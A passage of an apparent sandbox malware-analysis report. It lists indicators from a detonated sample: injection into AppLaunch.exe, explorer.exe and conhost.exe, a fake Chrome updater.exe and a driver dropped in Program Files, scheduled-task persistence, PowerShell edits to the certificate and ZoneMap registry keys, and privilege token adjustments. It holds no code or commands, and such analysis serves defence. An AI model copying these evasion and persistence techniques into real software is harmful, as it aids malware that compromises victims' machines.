PID 2888 set thread context of 1408 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2708 set thread context of 4544 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 2708 set thread context of 468 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4612 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4612 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4612 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4828 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 4828 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 4612 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 4612 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 4612 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2888 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2888 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2888 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2888 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2888 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3060 wrote to memory of 4140 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3060 wrote to memory of 4140 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3060 wrote to memory of 868 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3060 wrote to memory of 868 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3060 wrote to memory of 4548 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3060 wrote to memory of 4548 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3060 wrote to memory of 2252 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3060 wrote to memory of 2252 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3060 wrote to memory of 2308 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3060 wrote to memory of 2308 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4724 wrote to memory of 1144 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4724 wrote to memory of 1144 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4724 wrote to memory of 1340 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4724 wrote to memory of 1340 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4724 wrote to memory of 1888 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4724 wrote to memory of 1888 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4724 wrote to memory of 3740 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4724 wrote to memory of 3740 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4612 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 4612 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 4612 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2084 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2084 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
